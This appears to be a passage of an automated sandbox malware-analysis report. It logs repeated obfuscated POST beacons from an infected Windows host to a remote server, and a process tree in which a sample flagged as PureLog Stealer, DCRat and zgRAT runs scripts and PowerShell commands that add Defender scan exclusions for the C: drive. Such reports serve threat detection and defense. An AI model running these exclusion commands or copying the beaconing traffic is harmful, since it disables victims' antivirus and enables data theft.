                                                                                          Jan 4, 2025 11:09:31.098578930 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:31.451946020 CET  2520  OUT  Data Raw: 51 5d 5b 50 50 5e 5a 56 5c 5b 52 58 57 5e 58 5a 58 50 5a 5a 52 56 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q][PP^ZV\[RXW^XZXPZZRVQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D(977T&U8=<"=%\$<!.-(<? "=_=!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:31.575655937 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:31.847848892 CET  809  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xmBnmwVtCirQYKDAmzoz%2B1VUiAXU2%2BM7J%2B%2BxDyP5Lzz0cl5TSbMgSzVEI09BurY8yoJC0Ya73y9gHLpkRQ8gdzMFjDqKksUnqHk8JaGz3Q%2BOqIVW3OYfODvpBBzNXzhyomxlFGIk"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6efc08a27279-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6752&min_rtt=5649&rtt_var=4324&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=100877&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          144         192.168.2.4  50152        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:31.848490953 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:32.202939987 CET  1844  OUT  Data Raw: 54 5b 5b 55 55 5f 5a 5d 5c 5b 52 58 57 5b 58 5b 58 52 5a 5a 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[[UU_Z]\[RXW[X[XRZZRQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D= ;>% $)<.5=&.74>.W?<+]<8#-*+!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:32.293550968 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:32.610491991 CET  955  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4Uz56rZuv0n07L%2F%2Bhu7KezKFsOsQ3tlAxKxEU8Vng9Rjpu7PJX0Ge1jNO%2FuQGm3AMPuQ7JTKA31f4rRolHU5VtSWWzgHpntlNNsPGAar43WTfY8k0eqNrpxESktTbcSEtS%2F1kqI"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f008ce6439f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1751&rtt_var=967&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=487479&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1c 28 00 0a 51 35 06 24 10 3d 58 3a 59 25 56 24 13 2c 21 3b 5e 20 12 3c 03 2c 22 04 01 30 0d 2c 15 3d 01 30 57 20 20 2f 1d 30 0a 2a 5d 06 12 38 1d 3e 2f 3a 10 26 2b 25 0a 3d 0c 22 45 33 26 2a 5a 30 5b 2b 59 3f 12 39 5a 24 2c 2a 08 3e 2f 36 5e 39 5c 34 0b 2f 2c 30 1c 22 39 21 53 08 13 20 57 32 31 0d 10 3d 0e 22 03 26 0d 13 11 26 3a 0e 0c 29 06 30 19 30 07 3d 05 2d 21 3f 5d 2b 30 2b 00 2c 3e 2f 04 3c 3e 38 0e 27 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(Q5$=X:Y%V$,!;^ <,"0,=0W /0*]8>/:&+%="E3&*Z0[+Y?9Z$,*>/6^9\4/,0"9!S W21="&&:)00=-!?]+0+,>/<>8'"\ #V=WL0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          145         192.168.2.4  50153        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:31.968924046 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:32.326945066 CET  2520  OUT  Data Raw: 54 51 5e 5e 55 5f 5a 54 5c 5b 52 58 57 5f 58 5e 58 53 5a 53 52 51 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ^^U_ZT\[RXW_X^XSZSRQQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>904*1(>Z:5:'-+V#X&???\<&4)*;!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:32.412290096 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:32.589107037 CET  803  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Be0MHO9CpXcD6%2BH8%2Fc4ULagvg22etqeC5AUK7baeqtYYOfLgVqiS0UrEwvYXkV6TBcXQ57cr4n9XdV2662bGxwAYYNXiayIvwrjbVvH6tJS4Pm1xaFtSjbRE5e3ZLV16r1ZCPybe"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f014d49c445-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2301&min_rtt=1507&rtt_var=2153&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=185750&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          146         192.168.2.4  50154        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:32.719013929 CET  293  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:33.076935053 CET | 2512 | OUT | Data Raw: 54 5d 5e 5f 55 5f 5a 55 5c 5b 52 58 57 5a 58 5a 58 50 5a 53 52 55 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^_U_ZU\[RXWZXZXPZSRUQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*9#;!'37(/*"-\03V7>)(<(<;"-&)!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:33.183233976 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:33.361776114 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IvMT12ny7Ql50A1%2Fv%2Bk2cszKXQu7OKu3eSXXz0Hb7Z%2B9uRDCAXJP89Yi99ku6m6eYDfA%2BtZqQo6GTMCcod9eHi0B%2Bvt9z4uVbRWib9DeNroLB1WVPqmNxvgZ6vBgQOo2gr%2B%2Fkjkc"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f061e9b0f7d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2885&min_rtt=1572&rtt_var=3215&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2805&delivery_rate=120890&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          147 | 192.168.2.4 | 50155 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:33.488331079 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:33.842590094 CET | 2520 | OUT | Data Raw: 54 51 5e 55 50 5f 5f 50 5c 5b 52 58 57 5f 58 5e 58 53 5a 52 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ^UP__P\[RXW_X^XSZRRTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.(94#P1U *Z"-''R!."P</3_(&'4">+!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:33.947079897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:34.213927984 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRn8HR16W%2BQUHeHDa3ojawxJi6B0FzPfqy0v2ehGeCJ5ixiFVnffiV0u1ih8K9q%2FrHNxY2z%2Bt73sBv4XqosmweoGpB4CWdVsRce5bxlZWomA8Km%2BOXxXvbaDRUtgMX6RTSlTi6MB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f0aef5543bc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3297&min_rtt=1767&rtt_var=3723&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=104211&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          148 | 192.168.2.4 | 50156 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:34.344669104 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:34.703591108 CET | 2520 | OUT | Data Raw: 51 5c 5e 56 50 58 5f 50 5c 5b 52 58 57 5c 58 59 58 57 5a 59 52 57 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^VPX_P\[RXW\XYXWZYRWQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->47&0#_>16=$4="Q),++#_ .:^*;!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:34.809156895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:34.989233971 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RLo6LpW9WFPa2Vn3l%2BzXv%2BadZV9ewzIbLqTw1XBhxADgK8%2BJpo8jdj07JdnEYkr4%2BR2%2FBcPFviopwASWvX%2Bro2b4vhzV2hIcVfSSP9viQRDRUo0f7m7shWUWHJad54GT0fAUWkSW"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f104a180f49-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3094&min_rtt=1603&rtt_var=3583&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=107884&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          149 | 192.168.2.4 | 50157 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:35.121694088 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:35.467626095 CET | 2516 | OUT | Data Raw: 51 5a 5b 53 50 5c 5f 53 5c 5b 52 58 57 5a 58 52 58 54 5a 59 52 5c 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[SP\_S\[RXWZXRXTZYR\Q\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@*?C"8!%?\*-Z!)Y3=' X&+/*&3]7*+!Y#!Y,
                                                                                          Jan 4, 2025 11:09:35.565550089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:35.824965000 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZZksmgC7%2Ff3JDYPUAmAyhWslRlS2hP%2Bi6Drw4clFRsYCqxyw4RP8d9ekro7CAxURqiSIAOGjXSJzECT9%2BmbajcKKS6%2FzX8ZotxR61sh%2BMSQ2yDzF0ehB0VORusiDW0fn4YyPHZ4"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f1508cf5e7a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3774&min_rtt=1633&rtt_var=4895&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=77808&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Target ID:0
                                                                                          Start time:05:06:56
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\HMhdtzxEHf.exe"
                                                                                          Imagebase:0xa30000
                                                                                          File size:4'000'497 bytes
                                                                                          MD5 hash:BC8116E0B506345BF1DE248886A52F86
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:05:06:56
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe"
                                                                                          Imagebase:0x50000
                                                                                          File size:147'456 bytes
                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:05:07:02
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:3
                                                                                          Start time:05:07:02
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:4
                                                                                          Start time:05:07:02
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\serverDll.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\ChainbrowserNet/serverDll.exe"
                                                                                          Imagebase:0x330000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:24
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:25
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:26
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:27
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:28
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
